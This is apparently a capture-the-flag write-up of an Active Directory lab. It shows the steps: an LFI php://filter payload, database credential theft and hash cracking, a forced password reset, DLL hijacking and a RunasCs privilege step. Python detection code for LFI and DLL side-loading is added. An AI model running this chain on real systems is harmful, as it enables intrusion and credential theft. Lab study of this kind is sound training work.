Trusted is an Active Directory chain from VulnLab that starts with an LFI leading to MySQL database access, followed by a compromise of the child domain and the exploitation of a bidirectional child-to-parent domain trust.
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-25 17:23:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
15289/tcp filtered unknown
27105/tcp filtered unknown
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49679/tcp open msrpc Microsoft Windows RPC
49690/tcp open msrpc Microsoft Windows RPC
54258/tcp open msrpc Microsoft Windows RPC
54907/tcp open msrpc Microsoft Windows RPC
55168/tcp filtered unknown
58346/tcp filtered unknown
59443/tcp open msrpc Microsoft Windows RPC
64014/tcp filtered unknown
Service Info: Host: TRUSTEDDC; OS: Windows; CPE: cpe:/o:microsoft
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-25 17:31:01Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
443/tcp open ssl/http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/8.1.6)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: trusted.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49368/tcp open msrpc Microsoft Windows RPC
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49677/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
53399/tcp open msrpc Microsoft Windows RPC
63593/tcp open msrpc Microsoft Windows RPC
Service Info: Host: LABDC; OS: Windows; CPE: cpe:/o:microsoft:windows
We start by visiting the web server hosted on port 80 of the 10.10.152.118 machine, and we are presented with the XAMPP dashboard page.
So, we decide to perform directory enumeration on the web server, as follows:
gobuster dir -u http://10.10.152.118/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 30
LFI
As we can see, the /dev folder gives access to a web page.
While checking each link in the navbar separately, we stumbled upon a parameter that looked vulnerable to local file inclusion (LFI). Knowing from the initial scan that this web server runs on Windows, we tried to access the C:\xampp\apache\conf\httpd.conf file, which was successful.
The /dev home page also contained an interesting note about an issue with a database connection PHP file. Since there is a MySQL server on this machine, that file is our next step towards initial access.
So we enumerate the /dev directory for PHP files in order to find that database connection file:
gobuster dir -u http://10.10.226.198/dev/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -t 30 -x php
The next step is to read db.php through the LFI. Including the file directly would execute its PHP rather than show it, so we use the php://filter wrapper to base64-encode the file, which returns its source instead:
http://10.10.226.198/dev/index.html?view=php://filter/convert.base64-encode/resource=db.php
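An added detection example, not part of the original writeup: it scans constructed Apache access-log lines for requests whose view parameter carries a stream wrapper, a path traversal sequence or an absolute path, the three shapes the LFI above takes. The parameter name view and the request paths follow the URLs in the post; the client IP, timestamps and byte counts are made up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format lines (client IP and times are made up);
# the request targets mirror the shapes seen on the /dev page.
SAMPLE_LOG = """\
10.8.0.5 - - [25/Nov/2024:17:40:01 +0000] "GET /dev/index.html?view=about.html HTTP/1.1" 200 512 "-" "curl/8.4.0"
10.8.0.5 - - [25/Nov/2024:17:40:09 +0000] "GET /dev/index.html?view=C:\\xampp\\apache\\conf\\httpd.conf HTTP/1.1" 200 21044 "-" "curl/8.4.0"
10.8.0.5 - - [25/Nov/2024:17:41:13 +0000] "GET /dev/index.html?view=php://filter/convert.base64-encode/resource=db.php HTTP/1.1" 200 388 "-" "curl/8.4.0"
10.8.0.5 - - [25/Nov/2024:17:42:20 +0000] "GET /dev/index.html?view=..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 92 "-" "curl/8.4.0"
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Values of an include parameter that point outside the intended page fragments.
INDICATORS = {
    "php_wrapper": re.compile(r"^(php|data|expect|file|phar|zip)://", re.I),
    "traversal": re.compile(r"(^|[\\/])\.\.([\\/]|$)"),
    "absolute_windows_path": re.compile(r"^[A-Za-z]:[\\/]"),
    "absolute_unix_path": re.compile(r"^/"),
}

def inspect_request(line, param="view"):
    """Return the indicator names that match the `param` value of one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    hits = []
    for value in parse_qs(query, keep_blank_values=True).get(param, []):
        value = unquote(value)  # parse_qs decoded once; decode again for double encoding
        for name, pattern in INDICATORS.items():
            if pattern.search(value) and name not in hits:
                hits.append(name)
    return hits

def scan_log(text, param="view"):
    """Return (line_number, indicators) for every request that trips an indicator."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        hits = inspect_request(line, param)
        if hits:
            findings.append((number, hits))
    return findings

if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

On the application side the same three shapes are what an allowlist of permitted fragment names removes, which is the fix for an include driven by a request parameter.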
Using the credentials found in db.php, we successfully access the MariaDB database:
mysql -u "root" -p -h 10.10.226.198
Enumerating the databases on the MySQL server, we picked the news database and found the following credentials in its users table.
Using hashcat with the rockyou.txt wordlist, we were only able to crack the first MD5 hash, that of rsmith, who appears to be a valid domain user in the lab.trusted.vl domain.
From the BloodHound graph we can see that rsmith has ForceChangePassword over ewalters, which we use to get a foothold on LABDC.lab.trusted.vl.
net rpc password "ewalters" "P@ssword2024" -U "lab.trusted.vl"/"rsmith"%"IHateEric2" -S "LABDC.lab.trusted.vl"
We can see that the password was changed successfully.
Afterwards, we PSRemote into the DC as ewalters using evil-winrm:
evil-winrm -u "lab.trusted.vl\ewalters" -p "P@ssword2024" -i 10.10.226.198
DLL Hijacking
We stumble upon KasperskyRemoval.exe, which appears to be run as cpowers (Christine), so she should be the next user we compromise.
We copy that executable to our local Windows machine and use Procmon to observe its behaviour.
After running it, we apply a filter for Kaspersky Removal in Procmon, and a second filter restricting the view to DLL files within that process.
Scrolling through the DLL files loaded by that process, we found that it looks for DLLs in the executable's own directory (in this case the Desktop folder) and gets NAME_NOT_FOUND. This suggests that we can place our own DLL with one of those names in that folder to perform DLL hijacking.
To narrow this down, we add a further filter for the DLLs that were not found and could therefore be hijacked.
This leaves us with KasperkyRemovalToolENU.dll, so using msfvenom we create a new DLL with the same name, KasperkyRemovalToolENU.dll, in the executable's directory.
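An added detection example, not from the original post and not code from VulnLab or the tool's vendor: it runs over constructed Sysmon Event ID 7 (ImageLoad) records and flags unsigned DLLs that a process maps from its own directory outside the system roots, which is exactly the trace the hijack above leaves. The C:\Tools path and the event records are assumptions made for the example, not the locations in the lab.

```python
import ntpath

# Side-by-side DLL loads under these roots are expected, and by default only
# administrators can write there; loads from anywhere else deserve a look.
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")

def classify_load(event):
    """Return a reason string when a Sysmon Event ID 7 record looks like a
    search-order hijack, or None when the load looks benign."""
    image = event["Image"].lower()          # the process doing the loading
    loaded = event["ImageLoaded"].lower()   # the DLL that was mapped
    if not loaded.endswith(".dll") or loaded.startswith(TRUSTED_ROOTS):
        return None
    signed = event.get("Signed", "false").lower() == "true"
    if signed:
        return None
    if ntpath.dirname(loaded) == ntpath.dirname(image):
        return "unsigned DLL loaded from the executable's own directory"
    return "unsigned DLL loaded from a non-system directory"

def find_hijack_loads(events):
    """Return (process, dll, reason) for every event classify_load flags."""
    return [(e["Image"], e["ImageLoaded"], reason)
            for e in events if (reason := classify_load(e))]

# Constructed Sysmon Event ID 7 (ImageLoad) records; C:\Tools is an assumed
# install path, not the location of the tool in the lab.
SAMPLE_EVENTS = [
    {"Image": "C:\\Tools\\KasperskyRemoval.exe",
     "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll", "Signed": "true"},
    {"Image": "C:\\Tools\\KasperskyRemoval.exe",
     "ImageLoaded": "C:\\Tools\\KasperkyRemovalToolENU.dll", "Signed": "false"},
    {"Image": "C:\\Program Files\\Vendor\\app.exe",
     "ImageLoaded": "C:\\Program Files\\Vendor\\helper.dll", "Signed": "true"},
    {"Image": "C:\\Program Files\\Vendor\\app.exe",
     "ImageLoaded": "C:\\Users\\cpowers\\AppData\\Local\\Temp\\plugin.dll", "Signed": "false"},
]

if __name__ == "__main__":
    for proc, dll, why in find_hijack_loads(SAMPLE_EVENTS):
        print(f"{proc} -> {dll}: {why}")
```

On the vendor side the gap is closed by loading helpers through fully qualified paths (or restricting the search path with SetDefaultDllDirectories) and by never placing the executable in a directory that the users running it can write to.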
The next step is to become Domain Admin on the parent domain trusted.vl, which we mapped during our BloodHound enumeration, through a child-to-parent domain trust attack.
For that we need the SIDs of the child and parent domains.
However, even though we have SYSTEM privileges on the machine, we cannot access the root.txt file on the Administrator's Desktop.
The access denied was due to EFS encryption (a Windows feature that lets users encrypt individual files or folders so that only authorized users can read them; even someone with access to the physical storage cannot read the encrypted files without the decryption key), as seen after running:
The solution was to first change the Administrator password with net user Administrator Password_123 and then use RunasCs to execute cmd.exe as the Administrator user with the new password:
.\runasCs.exe Administrator Password_123 "cmd.exe /c type C:\Users\Administrator\Desktop\root.txt"